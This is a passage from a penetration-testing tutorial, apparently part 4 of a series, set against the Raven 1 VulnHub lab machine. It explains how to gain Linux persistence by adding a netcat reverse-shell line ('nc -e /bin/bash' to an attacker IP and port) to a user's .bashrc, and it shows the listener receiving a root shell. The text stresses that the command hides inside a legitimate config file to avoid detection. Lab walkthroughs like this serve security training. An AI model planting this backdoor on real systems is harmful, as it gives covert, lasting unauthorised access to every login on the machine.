- Kali Linux OR Parrot OS
- Practical understanding of T*****/IP
- The tutorial were conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
https://www.vulnhub.com/entry/raven-1,256/
Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.
PART 4. UNIX SHELL CONFIGURATION MODIFICATION:
This persistence method will entail the insertion of a bash reverse command that shall initiate a connection back to our netcat listener in a user account's .bashrc file. The .bashrc file is a configuration file which is employed for personalising bash, and is executed when a user logs in using the bash shell.
The initial step will involve the opening of the .bashrc file utilising a text editor. This shall be accomplished through the execution of the following command:
Code: Select all
nano ~/.bashrcUpon opening the aforementioned file by means of a text editor, we can incorporate a basic bash command which will afford us a reverse shell each time a user logs in. This can be achieved through the insertion of the following code:
Code: Select all
nc -e /bin/bash <KALI-IP> <PORT> 2>/dev/nullAs displayed in the subsequent terminal, the said command shall incorporate your Kali IP and the port at which netcat is in a state of listening.
TerminalCode: Select all
# Some more alias to avoid making mistakes:
# alias rm=' rm -i'
# alias *****=' ***** -i'
# alias mv=' mv -i'
nc -e /bin/bash 192.168.2.2 1234 2>/dev/null
Having integrated the aforementioned bash command into the .bashrc file, we shall then establish a listener via Netcat on Kali by executing the ensuing directive:
Code: Select all
nc -nvlp <PORT>Upon a user logging in to the aforementioned user account, the command embedded within the .bashrc file shall be triggered and forthwith provide one with a reverse shell on the netcat listener, as evidenced by the ensuing terminal.
TerminalCode: Select all
> $ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.2.2] from (UNKNOWN) [192.168.2.100] 50123
id
uid=0(root) gid=0(root) groups=0(root)
We have now successfully established a degree of persistence by means of the .bashrc file. This method is particularly advantageous due to the concealed nature of the reverse shell command, which resides within a legitimate configuration file, thereby mitigating the likelihood of detection.
